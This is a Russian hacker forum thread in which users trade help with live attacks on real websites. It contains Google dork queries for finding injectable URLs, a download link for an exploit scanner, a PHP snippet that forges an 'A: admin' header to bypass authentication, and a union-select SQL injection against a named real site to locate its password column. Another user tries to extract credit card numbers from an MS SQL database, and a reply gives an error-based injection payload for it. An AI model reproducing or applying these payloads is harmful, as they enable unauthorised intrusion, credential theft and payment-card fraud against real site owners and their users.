 |
|
14.04.2010, 23:05
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от jecka3000
нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
и т.д.
http://slil.ru/28959824
пасс: antichat
|
|
|
14.04.2010, 23:06
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Redwood
скинь сюда название, полное
|
|
|
|
14.04.2010, 23:09
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от jecka3000
Redwood
скинь сюда название, полное
SQLi/XSS/LFI/RFI Exploit Scanner
|
|
|
|
14.04.2010, 23:12
|
|
Новичок
Регистрация: 01.04.2009
Сообщений: 14
С нами:
9005843
Репутация:
10
|
|
Сообщение от попугай
послать заголовок A=admin
решено,
спасибо огромное!!!
Последний раз редактировалось Zilt0; 14.04.2010 в 23:14..
|
|
|
|
14.04.2010, 23:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Просто "A"
|
|
|
|
14.04.2010, 23:14
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Zilt0
с помощью Acunetix Web Vulnerability - Http editor, добавляю заголовок HTTP_A, но авторизация не проходит,
может я не то делаю?
надо не HTTP_A, а A.
вот на php пример
PHP код:
echo get('www.entropy.ch', '/software/MacOSX/php/test.php', 'http://google.com/', 'firefox', '');
function get($hostname, $path, $ref, $ua, $cook)
{
$line="";
$fp=fsockopen($hostname, 80, $errno, $errstr, 60);
if(!$fp) echo $errstr($errno);
else
{
$headers = "GET $path HTTP/1.1\r\n";
$headers .="Host: $hostname\r\n";
$headers .="User-Agent: $ua\r\n";
$headers .= "Accept-Language: en,en-US;q=0.9,en;q=0.8\r\n";
$headers .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
$headers .="Cookie: $cook\r\n";
$headers .="A: admin\r\n";
$headers .="Connection: Close\r\n";
$headers .="Referer: $ref\r\n\r\n";
fwrite($fp, $headers);
while(!feof($fp)){
$line .= fgets($fp, 1024);
}
fclose($fp);
}
return $line;
}
|
|
|
|
14.04.2010, 23:14
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
http://www.kino.ru/forum.php?id=-2274+union+select+1,2,3--
помогите найти столбец паролей. Нашел мыла, логины, пароли найти не могу.
Версия: 4
|
|
|
|
14.04.2010, 23:33
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Сообщение от попугай
нет смысла инклюдить /etc/passwd - там же написано, что open_basedir врублен.
Ну я показал пример самого способа ( хот и не очень удачный, так как не учел условия для выхода за пределы каталога ).
|
|
|
|
15.04.2010, 02:01
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
эмм...
вот такая проблема
MS SQL /Version:
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
когда делаю вот такой запрос:
1'+or+1=(select+top+1+CardNumber+from+CCards)--
и в ответ
Типы данных text, ntext и image недействительны в этом подопросе или в этом выражении агрегата.
hex,aes_encrypt(aes_.. не идут
Original
Microsoft OLE DB Provider for ODBC Drivers- Fehler '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Die Datentypen text, ntext und image sind in dieser Unterabfrage oder in diesem Aggregatausdruck ungültig.
/inc/session.inc, line 25
остольные columns все идут..
Последний раз редактировалось [Feldmarschall]; 23.04.2010 в 18:43..
|
|
|
|
15.04.2010, 12:57
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами:
9364549
Репутация:
184
|
|
[Feldmarschall]
В MSSQL: and(1)=convert(int,@@version)--
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2073437){kind=avatar}
Похожие темы
Линейный вид
